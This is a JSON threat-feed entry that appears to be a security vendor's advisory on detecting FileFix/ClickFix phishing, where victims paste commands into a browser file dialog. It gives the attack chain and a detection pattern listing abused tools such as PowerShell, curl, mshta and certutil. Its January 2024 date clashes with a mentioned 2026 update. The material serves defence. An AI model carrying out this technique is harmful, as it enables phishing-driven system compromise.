{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/filefix/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["high"],"_cs_tags":["phishing","execution","filefix","clickfix","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies a specific phishing technique known as \u0026ldquo;FileFix\u0026rdquo; or \u0026ldquo;ClickFix,\u0026rdquo; where attackers craft malicious web pages that instruct victims to copy and paste commands into a browser dialog box, leading to execution of those commands on the victim\u0026rsquo;s system. The attack leverages the browser\u0026rsquo;s file-picker functionality to launch processes, bypassing typical security measures. The detection focuses on identifying processes like PowerShell, curl, and others being launched with parent process arguments indicative of this attack pattern: specifically, processes with parent arguments including \u003ccode\u003e--message-loop-type-ui\u003c/code\u003e and \u003ccode\u003e--service-sandbox-type=none\u003c/code\u003e. This is a high-severity threat due to its potential to bypass security controls and execute arbitrary commands. The rule has been actively maintained and updated by Elastic, with the latest update on May 3, 2026, and is designed to work with Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Windows Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim visits a malicious website that uses the FileFix/ClickFix technique.\u003c/li\u003e\n\u003cli\u003eThe website prompts the victim to copy a malicious command to their clipboard.\u003c/li\u003e\n\u003cli\u003eThe website uses JavaScript to simulate a file download dialog.\u003c/li\u003e\n\u003cli\u003eThe victim pastes the malicious command into the file name field of the dialog box.\u003c/li\u003e\n\u003cli\u003eThe victim clicks \u0026ldquo;Save\u0026rdquo; or \u0026ldquo;Open\u0026rdquo;, triggering the execution of the pasted command.\u003c/li\u003e\n\u003cli\u003eThe browser launches a process (e.g., powershell.exe, cmd.exe) using the file-picker API.\u003c/li\u003e\n\u003cli\u003eThe launched process executes the malicious command, potentially downloading and executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system, potentially leading to data exfiltration, ransomware deployment, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful FileFix/ClickFix attack can lead to complete system compromise. Since the attack relies on user interaction, it can bypass traditional security measures. Successful exploitation can result in arbitrary code execution, potentially leading to data theft, malware installation, or system disruption. The severity is high, given the potential for significant damage and the ease with which this technique can be deployed via phishing campaigns. While the exact number of victims is not specified, the broad applicability of this technique makes it a significant threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect this activity and tune it for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command line arguments to ensure the Sigma rule functions correctly.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for processes with a parent process having arguments \u003ccode\u003e--message-loop-type-ui\u003c/code\u003e and \u003ccode\u003e--service-sandbox-type=none\u003c/code\u003e launching \u003ccode\u003epwsh.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003emsiexec.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, or \u003ccode\u003ecertreq.exe\u003c/code\u003e to identify potential FileFix/ClickFix attacks.\u003c/li\u003e\n\u003cli\u003eImplement user awareness training to educate users about the risks of copying and pasting commands from untrusted websites.\u003c/li\u003e\n\u003cli\u003eBlock execution of processes from the \u003ccode\u003eC:\\Users\\*\\Downloads\\\u003c/code\u003e path unless explicitly approved and verified.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T18:22:00Z","date_published":"2024-01-02T18:22:00Z","id":"/briefs/2024-01-filefix-phishing/","summary":"Detects potential execution of Windows commands or downloaded files via the browser's dialog box, where adversaries may use phishing to instruct victims to copy and paste malicious commands for execution.","title":"Potential Execution via FileFix Phishing Attack","url":"https://feed.craftedsignal.io/briefs/2024-01-filefix-phishing/"}],"language":"en","title":"CraftedSignal Threat Feed — Filefix","version":"https://jsonfeed.org/version/1.1"}